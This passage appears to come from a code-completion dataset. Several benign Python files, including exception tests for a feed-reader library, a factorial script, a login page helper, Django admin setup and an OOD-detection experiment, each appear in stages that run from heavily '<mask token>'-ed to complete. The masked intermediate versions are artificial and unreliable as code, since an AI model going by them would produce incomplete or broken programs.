SingleUpdateHookError(*args)\n exc.__cause__ = Exception('cause')\n assert str(exc) == expected + ': builtins.Exception: cause'\n",
"step-2": "<mask token>\n\n\ndef test_fancy_exception_base():\n exc = _FancyExceptionBase('message')\n assert str(exc) == 'message'\n exc = _FancyExceptionBase(message='message')\n assert str(exc) == 'message'\n cause = Exception('cause')\n exc = _FancyExceptionBase('message')\n exc.__cause__ = cause\n pickled_exc = pickle.dumps(exc)\n assert str(exc) == 'message: builtins.Exception: cause'\n assert str(exc) == str(pickle.loads(pickled_exc))\n\n\n class WithURL(_FancyExceptionBase):\n message = 'default message'\n\n def __init__(self, url, **kwargs):\n super().__init__(**kwargs)\n self.url = url\n\n @property\n def _str(self):\n return self.url.upper()\n exc = WithURL('url')\n assert str(exc) == 'default message: URL'\n exc = WithURL('url', message='another message')\n exc.__cause__ = cause\n assert str(exc) == 'another message: URL: builtins.Exception: cause'\n\n\ndef _all_classes(cls):\n yield cls\n for subclass in cls.__subclasses__():\n yield from _all_classes(subclass)\n\n\ndef all_classes(*args, **kwargs):\n return list(_all_classes(*args, **kwargs))\n\n\[email protected]('exc_type', all_classes(FeedError))\ndef test_feed_error_str(exc_type):\n exc = exc_type('url')\n assert repr('url') in str(exc)\n\n\n<mask token>\n\n\[email protected]('exc_type', all_classes(TagError))\ndef test_tag_error_str(exc_type):\n exc = exc_type(('object',), 'key')\n assert \"'object': 'key'\" in str(exc)\n\n\[email protected]('args, expected', [(('before_feeds_update',\n 'myhook'), \"unexpected hook error: before_feeds_update: 'myhook'\"), ((\n 'before_feeds_update', 'myhook', ()),\n \"unexpected hook error: before_feeds_update: 'myhook': ()\"), ((\n 'before_feed_update', 'myhook', ('feed',)),\n \"unexpected hook error: before_feed_update: 'myhook': 'feed'\"), ((\n 'after_entry_update', 'myhook', ('feed', 'entry')),\n \"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')\")])\ndef test_single_update_hook_error_str(args, expected):\n exc = SingleUpdateHookError(*args)\n assert str(exc) == expected\n exc = SingleUpdateHookError(*args)\n exc.__cause__ = Exception('cause')\n assert str(exc) == expected + ': builtins.Exception: cause'\n",
"step-3": "<mask token>\n\n\ndef test_fancy_exception_base():\n exc = _FancyExceptionBase('message')\n assert str(exc) == 'message'\n exc = _FancyExceptionBase(message='message')\n assert str(exc) == 'message'\n cause = Exception('cause')\n exc = _FancyExceptionBase('message')\n exc.__cause__ = cause\n pickled_exc = pickle.dumps(exc)\n assert str(exc) == 'message: builtins.Exception: cause'\n assert str(exc) == str(pickle.loads(pickled_exc))\n\n\n class WithURL(_FancyExceptionBase):\n message = 'default message'\n\n def __init__(self, url, **kwargs):\n super().__init__(**kwargs)\n self.url = url\n\n @property\n def _str(self):\n return self.url.upper()\n exc = WithURL('url')\n assert str(exc) == 'default message: URL'\n exc = WithURL('url', message='another message')\n exc.__cause__ = cause\n assert str(exc) == 'another message: URL: builtins.Exception: cause'\n\n\ndef _all_classes(cls):\n yield cls\n for subclass in cls.__subclasses__():\n yield from _all_classes(subclass)\n\n\ndef all_classes(*args, **kwargs):\n return list(_all_classes(*args, **kwargs))\n\n\[email protected]('exc_type', all_classes(FeedError))\ndef test_feed_error_str(exc_type):\n exc = exc_type('url')\n assert repr('url') in str(exc)\n\n\[email protected]('exc_type', all_classes(EntryError))\ndef test_entry_error_str(exc_type):\n exc = exc_type('url', 'id')\n assert repr(('url', 'id')) in str(exc)\n\n\[email protected]('exc_type', all_classes(TagError))\ndef test_tag_error_str(exc_type):\n exc = exc_type(('object',), 'key')\n assert \"'object': 'key'\" in str(exc)\n\n\[email protected]('args, expected', [(('before_feeds_update',\n 'myhook'), \"unexpected hook error: before_feeds_update: 'myhook'\"), ((\n 'before_feeds_update', 'myhook', ()),\n \"unexpected hook error: before_feeds_update: 'myhook': ()\"), ((\n 'before_feed_update', 'myhook', ('feed',)),\n \"unexpected hook error: before_feed_update: 'myhook': 'feed'\"), ((\n 'after_entry_update', 'myhook', ('feed', 'entry')),\n \"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')\")])\ndef test_single_update_hook_error_str(args, expected):\n exc = SingleUpdateHookError(*args)\n assert str(exc) == expected\n exc = SingleUpdateHookError(*args)\n exc.__cause__ = Exception('cause')\n assert str(exc) == expected + ': builtins.Exception: cause'\n",
"step-4": "import pickle\nimport pytest\nfrom reader import EntryError\nfrom reader import FeedError\nfrom reader import SingleUpdateHookError\nfrom reader import TagError\nfrom reader.exceptions import _FancyExceptionBase\n\n\ndef test_fancy_exception_base():\n exc = _FancyExceptionBase('message')\n assert str(exc) == 'message'\n exc = _FancyExceptionBase(message='message')\n assert str(exc) == 'message'\n cause = Exception('cause')\n exc = _FancyExceptionBase('message')\n exc.__cause__ = cause\n pickled_exc = pickle.dumps(exc)\n assert str(exc) == 'message: builtins.Exception: cause'\n assert str(exc) == str(pickle.loads(pickled_exc))\n\n\n class WithURL(_FancyExceptionBase):\n message = 'default message'\n\n def __init__(self, url, **kwargs):\n super().__init__(**kwargs)\n self.url = url\n\n @property\n def _str(self):\n return self.url.upper()\n exc = WithURL('url')\n assert str(exc) == 'default message: URL'\n exc = WithURL('url', message='another message')\n exc.__cause__ = cause\n assert str(exc) == 'another message: URL: builtins.Exception: cause'\n\n\ndef _all_classes(cls):\n yield cls\n for subclass in cls.__subclasses__():\n yield from _all_classes(subclass)\n\n\ndef all_classes(*args, **kwargs):\n return list(_all_classes(*args, **kwargs))\n\n\[email protected]('exc_type', all_classes(FeedError))\ndef test_feed_error_str(exc_type):\n exc = exc_type('url')\n assert repr('url') in str(exc)\n\n\[email protected]('exc_type', all_classes(EntryError))\ndef test_entry_error_str(exc_type):\n exc = exc_type('url', 'id')\n assert repr(('url', 'id')) in str(exc)\n\n\[email protected]('exc_type', all_classes(TagError))\ndef test_tag_error_str(exc_type):\n exc = exc_type(('object',), 'key')\n assert \"'object': 'key'\" in str(exc)\n\n\[email protected]('args, expected', [(('before_feeds_update',\n 'myhook'), \"unexpected hook error: before_feeds_update: 'myhook'\"), ((\n 'before_feeds_update', 'myhook', ()),\n \"unexpected hook error: before_feeds_update: 'myhook': ()\"), ((\n 'before_feed_update', 'myhook', ('feed',)),\n \"unexpected hook error: before_feed_update: 'myhook': 'feed'\"), ((\n 'after_entry_update', 'myhook', ('feed', 'entry')),\n \"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')\")])\ndef test_single_update_hook_error_str(args, expected):\n exc = SingleUpdateHookError(*args)\n assert str(exc) == expected\n exc = SingleUpdateHookError(*args)\n exc.__cause__ = Exception('cause')\n assert str(exc) == expected + ': builtins.Exception: cause'\n",
"step-5": "import pickle\n\nimport pytest\n\nfrom reader import EntryError\nfrom reader import FeedError\nfrom reader import SingleUpdateHookError\nfrom reader import TagError\nfrom reader.exceptions import _FancyExceptionBase\n\n\ndef test_fancy_exception_base():\n exc = _FancyExceptionBase('message')\n assert str(exc) == 'message'\n\n exc = _FancyExceptionBase(message='message')\n assert str(exc) == 'message'\n\n cause = Exception('cause')\n\n exc = _FancyExceptionBase('message')\n exc.__cause__ = cause\n pickled_exc = pickle.dumps(exc)\n assert str(exc) == 'message: builtins.Exception: cause'\n assert str(exc) == str(pickle.loads(pickled_exc))\n\n class WithURL(_FancyExceptionBase):\n message = 'default message'\n\n def __init__(self, url, **kwargs):\n super().__init__(**kwargs)\n self.url = url\n\n @property\n def _str(self):\n return self.url.upper()\n\n exc = WithURL('url')\n assert str(exc) == 'default message: URL'\n\n exc = WithURL('url', message='another message')\n exc.__cause__ = cause\n assert str(exc) == 'another message: URL: builtins.Exception: cause'\n\n\ndef _all_classes(cls):\n yield cls\n for subclass in cls.__subclasses__():\n yield from _all_classes(subclass)\n\n\ndef all_classes(*args, **kwargs):\n return list(_all_classes(*args, **kwargs))\n\n\[email protected]('exc_type', all_classes(FeedError))\ndef test_feed_error_str(exc_type):\n exc = exc_type('url')\n assert repr('url') in str(exc)\n\n\[email protected]('exc_type', all_classes(EntryError))\ndef test_entry_error_str(exc_type):\n exc = exc_type('url', 'id')\n assert repr(('url', 'id')) in str(exc)\n\n\[email protected]('exc_type', all_classes(TagError))\ndef test_tag_error_str(exc_type):\n exc = exc_type(('object',), 'key')\n assert \"'object': 'key'\" in str(exc)\n\n\[email protected](\n 'args, expected',\n [\n (\n ('before_feeds_update', 'myhook'),\n \"unexpected hook error: before_feeds_update: 'myhook'\",\n ),\n (\n ('before_feeds_update', 'myhook', ()),\n \"unexpected hook error: before_feeds_update: 'myhook': ()\",\n ),\n (\n ('before_feed_update', 'myhook', ('feed',)),\n \"unexpected hook error: before_feed_update: 'myhook': 'feed'\",\n ),\n (\n ('after_entry_update', 'myhook', ('feed', 'entry')),\n \"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')\",\n ),\n ],\n)\ndef test_single_update_hook_error_str(args, expected):\n exc = SingleUpdateHookError(*args)\n assert str(exc) == expected\n exc = SingleUpdateHookError(*args)\n exc.__cause__ = Exception('cause')\n assert str(exc) == expected + \": builtins.Exception: cause\"\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def fact(n):
c = 1
for i in range(1, n + 1):
c *= i
return c
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def fact(n):
c = 1
for i in range(1, n + 1):
c *= i
return c
print(fact(n))
<|reserved_special_token_1|>
n = int(input('val : '))
def fact(n):
c = 1
for i in range(1, n + 1):
c *= i
return c
print(fact(n))
<|reserved_special_token_1|>
n=int(input("val : "))
def fact(n):
c=1;
for i in range(1,n+1):
c*=i;
return c;
print(fact(n));
|
flexible
|
{
"blob_id": "1f4d9f5406b91fd687c0ace8ed29e3c4dfb4d3d2",
"index": 8748,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef fact(n):\n c = 1\n for i in range(1, n + 1):\n c *= i\n return c\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef fact(n):\n c = 1\n for i in range(1, n + 1):\n c *= i\n return c\n\n\nprint(fact(n))\n",
"step-4": "n = int(input('val : '))\n\n\ndef fact(n):\n c = 1\n for i in range(1, n + 1):\n c *= i\n return c\n\n\nprint(fact(n))\n",
"step-5": "n=int(input(\"val : \"))\r\n\r\n\r\ndef fact(n):\r\n c=1;\r\n for i in range(1,n+1):\r\n c*=i;\r\n return c;\r\n\r\nprint(fact(n));",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Dang Kai
# @Date: 2018-10-30 15:52:57
# @Last Modified time: 2018-11-10 09:09:21
# @E-mail: [email protected]
# @Description:
from time import sleep
import sys
sys.path.append('../')
from common.encapsulation import BasePage
class IndexPage:
def login(self, username, password):
# 登录页面
BasePage.open_url(self,self.base_url)
BasePage.send_key(self,'css','#username',username)
BasePage.send_key(self,'css',"#password",password)
BasePage.click_element(self,"css",".ant-btn")
if __name__ == '__main__':
login_cookies(self)
|
normal
|
{
"blob_id": "463f50567c9dd4b7b47a84eea715541cec5d3cb5",
"index": 2110,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass IndexPage:\n\n def login(self, username, password):\n BasePage.open_url(self, self.base_url)\n BasePage.send_key(self, 'css', '#username', username)\n BasePage.send_key(self, 'css', '#password', password)\n BasePage.click_element(self, 'css', '.ant-btn')\n\n\n<mask token>\n",
"step-3": "<mask token>\nsys.path.append('../')\n<mask token>\n\n\nclass IndexPage:\n\n def login(self, username, password):\n BasePage.open_url(self, self.base_url)\n BasePage.send_key(self, 'css', '#username', username)\n BasePage.send_key(self, 'css', '#password', password)\n BasePage.click_element(self, 'css', '.ant-btn')\n\n\nif __name__ == '__main__':\n login_cookies(self)\n",
"step-4": "from time import sleep\nimport sys\nsys.path.append('../')\nfrom common.encapsulation import BasePage\n\n\nclass IndexPage:\n\n def login(self, username, password):\n BasePage.open_url(self, self.base_url)\n BasePage.send_key(self, 'css', '#username', username)\n BasePage.send_key(self, 'css', '#password', password)\n BasePage.click_element(self, 'css', '.ant-btn')\n\n\nif __name__ == '__main__':\n login_cookies(self)\n",
"step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author: Dang Kai\n# @Date: 2018-10-30 15:52:57\n# @Last Modified time: 2018-11-10 09:09:21\n# @E-mail: [email protected]\n# @Description:\nfrom time import sleep\nimport sys\nsys.path.append('../')\nfrom common.encapsulation import BasePage\n\n\nclass IndexPage:\n\n def login(self, username, password):\n # 登录页面\n BasePage.open_url(self,self.base_url)\n BasePage.send_key(self,'css','#username',username)\n BasePage.send_key(self,'css',\"#password\",password)\n BasePage.click_element(self,\"css\",\".ant-btn\")\n\nif __name__ == '__main__':\n login_cookies(self)\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
def solve(bt):
if len(bt) == n:
print(*bt, sep="")
exit()
for i in [1, 2, 3]:
if is_good(bt + [i]):
solve(bt + [i])
def is_good(arr):
for i in range(1, len(arr)//2+1):
if arr[-i:] == arr[-(i*2):-i]:
return False
return True
if __name__ == "__main__":
n = int(input())
solve([1])
|
normal
|
{
"blob_id": "65d5cee6899b0b75474e3898459bf2cfa8b3635b",
"index": 1042,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef is_good(arr):\n for i in range(1, len(arr) // 2 + 1):\n if arr[-i:] == arr[-(i * 2):-i]:\n return False\n return True\n\n\n<mask token>\n",
"step-3": "def solve(bt):\n if len(bt) == n:\n print(*bt, sep='')\n exit()\n for i in [1, 2, 3]:\n if is_good(bt + [i]):\n solve(bt + [i])\n\n\ndef is_good(arr):\n for i in range(1, len(arr) // 2 + 1):\n if arr[-i:] == arr[-(i * 2):-i]:\n return False\n return True\n\n\n<mask token>\n",
"step-4": "def solve(bt):\n if len(bt) == n:\n print(*bt, sep='')\n exit()\n for i in [1, 2, 3]:\n if is_good(bt + [i]):\n solve(bt + [i])\n\n\ndef is_good(arr):\n for i in range(1, len(arr) // 2 + 1):\n if arr[-i:] == arr[-(i * 2):-i]:\n return False\n return True\n\n\nif __name__ == '__main__':\n n = int(input())\n solve([1])\n",
"step-5": "def solve(bt):\n if len(bt) == n:\n print(*bt, sep=\"\")\n exit()\n\n for i in [1, 2, 3]:\n if is_good(bt + [i]):\n solve(bt + [i])\n\n\ndef is_good(arr):\n for i in range(1, len(arr)//2+1):\n if arr[-i:] == arr[-(i*2):-i]:\n return False\n return True\n\nif __name__ == \"__main__\":\n n = int(input())\n\n solve([1])",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
admin.site.register(Profile)
admin.site.register(Category)
admin.site.register(Post)
<|reserved_special_token_1|>
from django.contrib import admin
from blog.models import Post, Category, Profile
admin.site.register(Profile)
admin.site.register(Category)
admin.site.register(Post)
<|reserved_special_token_1|>
from django.contrib import admin
# Register your models here.
from blog.models import Post,Category,Profile
admin.site.register(Profile)
admin.site.register(Category)
admin.site.register(Post)
|
flexible
|
{
"blob_id": "20f0de097fdd8f2a435c06a73c6a90cc7ebc69ad",
"index": 4014,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nadmin.site.register(Profile)\nadmin.site.register(Category)\nadmin.site.register(Post)\n",
"step-3": "from django.contrib import admin\nfrom blog.models import Post, Category, Profile\nadmin.site.register(Profile)\nadmin.site.register(Category)\nadmin.site.register(Post)\n",
"step-4": "from django.contrib import admin\n\n# Register your models here.\nfrom blog.models import Post,Category,Profile\n\nadmin.site.register(Profile)\nadmin.site.register(Category)\nadmin.site.register(Post)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# coding: utf-8
# 2021/5/29 @ tongshiwei
import logging
def get_logger():
_logger = logging.getLogger("EduNLP")
_logger.setLevel(logging.INFO)
_logger.propagate = False
ch = logging.StreamHandler()
ch.setFormatter(logging.Formatter('[%(name)s, %(levelname)s] %(message)s'))
ch.setLevel(logging.INFO)
_logger.addHandler(ch)
return _logger
logger = get_logger()
|
normal
|
{
"blob_id": "41f71589d3fb9f5df218d8ffa0f608a890c73ad2",
"index": 8486,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_logger():\n _logger = logging.getLogger('EduNLP')\n _logger.setLevel(logging.INFO)\n _logger.propagate = False\n ch = logging.StreamHandler()\n ch.setFormatter(logging.Formatter('[%(name)s, %(levelname)s] %(message)s'))\n ch.setLevel(logging.INFO)\n _logger.addHandler(ch)\n return _logger\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_logger():\n _logger = logging.getLogger('EduNLP')\n _logger.setLevel(logging.INFO)\n _logger.propagate = False\n ch = logging.StreamHandler()\n ch.setFormatter(logging.Formatter('[%(name)s, %(levelname)s] %(message)s'))\n ch.setLevel(logging.INFO)\n _logger.addHandler(ch)\n return _logger\n\n\nlogger = get_logger()\n",
"step-4": "import logging\n\n\ndef get_logger():\n _logger = logging.getLogger('EduNLP')\n _logger.setLevel(logging.INFO)\n _logger.propagate = False\n ch = logging.StreamHandler()\n ch.setFormatter(logging.Formatter('[%(name)s, %(levelname)s] %(message)s'))\n ch.setLevel(logging.INFO)\n _logger.addHandler(ch)\n return _logger\n\n\nlogger = get_logger()\n",
"step-5": "# coding: utf-8\n# 2021/5/29 @ tongshiwei\nimport logging\n\n\ndef get_logger():\n _logger = logging.getLogger(\"EduNLP\")\n _logger.setLevel(logging.INFO)\n _logger.propagate = False\n ch = logging.StreamHandler()\n ch.setFormatter(logging.Formatter('[%(name)s, %(levelname)s] %(message)s'))\n ch.setLevel(logging.INFO)\n _logger.addHandler(ch)\n return _logger\n\n\nlogger = get_logger()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
Test the OOD-detection capabilities of models by scaling a random feature for all sample in the data set.
"""
# STD
import os
import pickle
from copy import deepcopy
from collections import defaultdict
import argparse
from typing import Tuple, Dict, List
# EXT
import numpy as np
from tqdm import tqdm
import torch
# PROJECT
from uncertainty_estimation.utils.model_init import AVAILABLE_MODELS
from uncertainty_estimation.utils.model_init import init_models
from uncertainty_estimation.utils.datahandler import DataHandler
from uncertainty_estimation.utils.novelty_analyzer import NoveltyAnalyzer
# CONST
SCALES = [10, 100, 1000, 10000]
N_FEATURES = 100
RESULT_DIR = "../../data/results"
def run_perturbation_experiment(
nov_an: NoveltyAnalyzer, X_test: np.ndarray, scoring_func: str = None
) -> Tuple[Dict[str, List[float]], Dict[str, List[float]]]:
"""Runs the perturbation experiment for a single novelty estimator.
Parameters
----------
nov_an: NoveltyAnalyzer
The novelty analyzer (handles scaling, imputation, evaluation)
X_test: np.ndarray
The test data to use
scoring_func: str
Which kind of novelty to evaluate (used for NN ensemble, where you can choose between
'std' and 'entropy'
Returns
-------
aucs_dict: dict
a dictionary of lists of OOD detection AUCS for different scales. The list contains the
detection AUCs for the same scale but different features.
recall_dict: dict
a dictionary of lists of recalled OOD fractions using the 95th percentile cutoff.The
list contains the recalls for the same scale but different features.
"""
aucs_dict = defaultdict(list)
recall_dict = defaultdict(list)
for scale_adjustment in tqdm(SCALES):
random_sample = np.random.choice(
np.arange(0, X_test.shape[1]), N_FEATURES, replace=False
)
for r in random_sample:
X_test_adjusted = deepcopy(nov_an.X_test)
X_test_adjusted[:, r] = X_test_adjusted[:, r] * scale_adjustment
nov_an.set_ood(X_test_adjusted, impute_and_scale=False)
nov_an.calculate_novelty(scoring_func=scoring_func)
aucs_dict[scale_adjustment] += [nov_an.get_ood_detection_auc()]
recall_dict[scale_adjustment] += [nov_an.get_ood_recall()]
return aucs_dict, recall_dict
if __name__ == "__main__":
np.random.seed(123)
torch.manual_seed(123)
parser = argparse.ArgumentParser()
parser.add_argument(
"--data_origin", type=str, default="MIMIC", help="Which data to use"
)
parser.add_argument(
"--models",
type=str,
nargs="+",
default=AVAILABLE_MODELS,
choices=AVAILABLE_MODELS,
help="Determine the models which are being used for this experiment.",
)
parser.add_argument(
"--result_dir",
type=str,
default=RESULT_DIR,
help="Define the directory that results should be saved to.",
)
args = parser.parse_args()
# Loading the data
dh = DataHandler(args.data_origin)
feature_names = dh.load_feature_names()
train_data, test_data, val_data = dh.load_data_splits()
y_name = dh.load_target_name()
for ne, scoring_funcs, name in init_models(
input_dim=len(feature_names), selection=args.models, origin=args.data_origin
):
print(name)
nov_an = NoveltyAnalyzer(
ne,
train_data[feature_names].values,
test_data[feature_names].values,
val_data[feature_names].values,
train_data[y_name].values,
test_data[y_name].values,
val_data[y_name].values,
)
nov_an.train()
for scoring_func in scoring_funcs:
aucs_dict, recall_dict = run_perturbation_experiment(
nov_an, test_data[feature_names], scoring_func=scoring_func
)
dir_name = os.path.join(
args.result_dir,
args.data_origin,
"perturbation",
name,
"detection",
scoring_func,
)
if not os.path.exists(dir_name):
os.makedirs(dir_name)
with open(os.path.join(dir_name, "recall.pkl"), "wb") as f:
pickle.dump(recall_dict, f)
with open(os.path.join(dir_name, "detect_auc.pkl"), "wb") as f:
pickle.dump(aucs_dict, f)
|
normal
|
{
"blob_id": "bf3e7f1aa9fd20b69e751da9ac8970c88b1144eb",
"index": 9363,
"step-1": "<mask token>\n\n\ndef run_perturbation_experiment(nov_an: NoveltyAnalyzer, X_test: np.ndarray,\n scoring_func: str=None) ->Tuple[Dict[str, List[float]], Dict[str, List[\n float]]]:\n \"\"\"Runs the perturbation experiment for a single novelty estimator.\n\n Parameters\n ----------\n nov_an: NoveltyAnalyzer\n The novelty analyzer (handles scaling, imputation, evaluation)\n X_test: np.ndarray\n The test data to use\n scoring_func: str\n Which kind of novelty to evaluate (used for NN ensemble, where you can choose between\n 'std' and 'entropy'\n\n Returns\n -------\n aucs_dict: dict\n a dictionary of lists of OOD detection AUCS for different scales. The list contains the\n detection AUCs for the same scale but different features.\n recall_dict: dict\n a dictionary of lists of recalled OOD fractions using the 95th percentile cutoff.The\n list contains the recalls for the same scale but different features.\n\n \"\"\"\n aucs_dict = defaultdict(list)\n recall_dict = defaultdict(list)\n for scale_adjustment in tqdm(SCALES):\n random_sample = np.random.choice(np.arange(0, X_test.shape[1]),\n N_FEATURES, replace=False)\n for r in random_sample:\n X_test_adjusted = deepcopy(nov_an.X_test)\n X_test_adjusted[:, r] = X_test_adjusted[:, r] * scale_adjustment\n nov_an.set_ood(X_test_adjusted, impute_and_scale=False)\n nov_an.calculate_novelty(scoring_func=scoring_func)\n aucs_dict[scale_adjustment] += [nov_an.get_ood_detection_auc()]\n recall_dict[scale_adjustment] += [nov_an.get_ood_recall()]\n return aucs_dict, recall_dict\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef run_perturbation_experiment(nov_an: NoveltyAnalyzer, X_test: np.ndarray,\n scoring_func: str=None) ->Tuple[Dict[str, List[float]], Dict[str, List[\n float]]]:\n \"\"\"Runs the perturbation experiment for a single novelty estimator.\n\n Parameters\n ----------\n nov_an: NoveltyAnalyzer\n The novelty analyzer (handles scaling, imputation, evaluation)\n X_test: np.ndarray\n The test data to use\n scoring_func: str\n Which kind of novelty to evaluate (used for NN ensemble, where you can choose between\n 'std' and 'entropy'\n\n Returns\n -------\n aucs_dict: dict\n a dictionary of lists of OOD detection AUCS for different scales. The list contains the\n detection AUCs for the same scale but different features.\n recall_dict: dict\n a dictionary of lists of recalled OOD fractions using the 95th percentile cutoff.The\n list contains the recalls for the same scale but different features.\n\n \"\"\"\n aucs_dict = defaultdict(list)\n recall_dict = defaultdict(list)\n for scale_adjustment in tqdm(SCALES):\n random_sample = np.random.choice(np.arange(0, X_test.shape[1]),\n N_FEATURES, replace=False)\n for r in random_sample:\n X_test_adjusted = deepcopy(nov_an.X_test)\n X_test_adjusted[:, r] = X_test_adjusted[:, r] * scale_adjustment\n nov_an.set_ood(X_test_adjusted, impute_and_scale=False)\n nov_an.calculate_novelty(scoring_func=scoring_func)\n aucs_dict[scale_adjustment] += [nov_an.get_ood_detection_auc()]\n recall_dict[scale_adjustment] += [nov_an.get_ood_recall()]\n return aucs_dict, recall_dict\n\n\nif __name__ == '__main__':\n np.random.seed(123)\n torch.manual_seed(123)\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_origin', type=str, default='MIMIC', help=\n 'Which data to use')\n parser.add_argument('--models', type=str, nargs='+', default=\n AVAILABLE_MODELS, choices=AVAILABLE_MODELS, help=\n 'Determine the models which are being used for this experiment.')\n parser.add_argument('--result_dir', type=str, default=RESULT_DIR, help=\n 'Define the directory that results should be saved to.')\n args = parser.parse_args()\n dh = DataHandler(args.data_origin)\n feature_names = dh.load_feature_names()\n train_data, test_data, val_data = dh.load_data_splits()\n y_name = dh.load_target_name()\n for ne, scoring_funcs, name in init_models(input_dim=len(feature_names),\n selection=args.models, origin=args.data_origin):\n print(name)\n nov_an = NoveltyAnalyzer(ne, train_data[feature_names].values,\n test_data[feature_names].values, val_data[feature_names].values,\n train_data[y_name].values, test_data[y_name].values, val_data[\n y_name].values)\n nov_an.train()\n for scoring_func in scoring_funcs:\n aucs_dict, recall_dict = run_perturbation_experiment(nov_an,\n test_data[feature_names], scoring_func=scoring_func)\n dir_name = os.path.join(args.result_dir, args.data_origin,\n 'perturbation', name, 'detection', scoring_func)\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n with open(os.path.join(dir_name, 'recall.pkl'), 'wb') as f:\n pickle.dump(recall_dict, f)\n with open(os.path.join(dir_name, 'detect_auc.pkl'), 'wb') as f:\n pickle.dump(aucs_dict, f)\n",
"step-3": "<mask token>\nSCALES = [10, 100, 1000, 10000]\nN_FEATURES = 100\nRESULT_DIR = '../../data/results'\n\n\ndef run_perturbation_experiment(nov_an: NoveltyAnalyzer, X_test: np.ndarray,\n scoring_func: str=None) ->Tuple[Dict[str, List[float]], Dict[str, List[\n float]]]:\n \"\"\"Runs the perturbation experiment for a single novelty estimator.\n\n Parameters\n ----------\n nov_an: NoveltyAnalyzer\n The novelty analyzer (handles scaling, imputation, evaluation)\n X_test: np.ndarray\n The test data to use\n scoring_func: str\n Which kind of novelty to evaluate (used for NN ensemble, where you can choose between\n 'std' and 'entropy'\n\n Returns\n -------\n aucs_dict: dict\n a dictionary of lists of OOD detection AUCS for different scales. The list contains the\n detection AUCs for the same scale but different features.\n recall_dict: dict\n a dictionary of lists of recalled OOD fractions using the 95th percentile cutoff.The\n list contains the recalls for the same scale but different features.\n\n \"\"\"\n aucs_dict = defaultdict(list)\n recall_dict = defaultdict(list)\n for scale_adjustment in tqdm(SCALES):\n random_sample = np.random.choice(np.arange(0, X_test.shape[1]),\n N_FEATURES, replace=False)\n for r in random_sample:\n X_test_adjusted = deepcopy(nov_an.X_test)\n X_test_adjusted[:, r] = X_test_adjusted[:, r] * scale_adjustment\n nov_an.set_ood(X_test_adjusted, impute_and_scale=False)\n nov_an.calculate_novelty(scoring_func=scoring_func)\n aucs_dict[scale_adjustment] += [nov_an.get_ood_detection_auc()]\n recall_dict[scale_adjustment] += [nov_an.get_ood_recall()]\n return aucs_dict, recall_dict\n\n\nif __name__ == '__main__':\n np.random.seed(123)\n torch.manual_seed(123)\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_origin', type=str, default='MIMIC', help=\n 'Which data to use')\n parser.add_argument('--models', type=str, nargs='+', default=\n AVAILABLE_MODELS, choices=AVAILABLE_MODELS, help=\n 'Determine the models which are being used for this experiment.')\n parser.add_argument('--result_dir', type=str, default=RESULT_DIR, help=\n 'Define the directory that results should be saved to.')\n args = parser.parse_args()\n dh = DataHandler(args.data_origin)\n feature_names = dh.load_feature_names()\n train_data, test_data, val_data = dh.load_data_splits()\n y_name = dh.load_target_name()\n for ne, scoring_funcs, name in init_models(input_dim=len(feature_names),\n selection=args.models, origin=args.data_origin):\n print(name)\n nov_an = NoveltyAnalyzer(ne, train_data[feature_names].values,\n test_data[feature_names].values, val_data[feature_names].values,\n train_data[y_name].values, test_data[y_name].values, val_data[\n y_name].values)\n nov_an.train()\n for scoring_func in scoring_funcs:\n aucs_dict, recall_dict = run_perturbation_experiment(nov_an,\n test_data[feature_names], scoring_func=scoring_func)\n dir_name = os.path.join(args.result_dir, args.data_origin,\n 'perturbation', name, 'detection', scoring_func)\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n with open(os.path.join(dir_name, 'recall.pkl'), 'wb') as f:\n pickle.dump(recall_dict, f)\n with open(os.path.join(dir_name, 'detect_auc.pkl'), 'wb') as f:\n pickle.dump(aucs_dict, f)\n",
"step-4": "<mask token>\nimport os\nimport pickle\nfrom copy import deepcopy\nfrom collections import defaultdict\nimport argparse\nfrom typing import Tuple, Dict, List\nimport numpy as np\nfrom tqdm import tqdm\nimport torch\nfrom uncertainty_estimation.utils.model_init import AVAILABLE_MODELS\nfrom uncertainty_estimation.utils.model_init import init_models\nfrom uncertainty_estimation.utils.datahandler import DataHandler\nfrom uncertainty_estimation.utils.novelty_analyzer import NoveltyAnalyzer\nSCALES = [10, 100, 1000, 10000]\nN_FEATURES = 100\nRESULT_DIR = '../../data/results'\n\n\ndef run_perturbation_experiment(nov_an: NoveltyAnalyzer, X_test: np.ndarray,\n scoring_func: str=None) ->Tuple[Dict[str, List[float]], Dict[str, List[\n float]]]:\n \"\"\"Runs the perturbation experiment for a single novelty estimator.\n\n Parameters\n ----------\n nov_an: NoveltyAnalyzer\n The novelty analyzer (handles scaling, imputation, evaluation)\n X_test: np.ndarray\n The test data to use\n scoring_func: str\n Which kind of novelty to evaluate (used for NN ensemble, where you can choose between\n 'std' and 'entropy'\n\n Returns\n 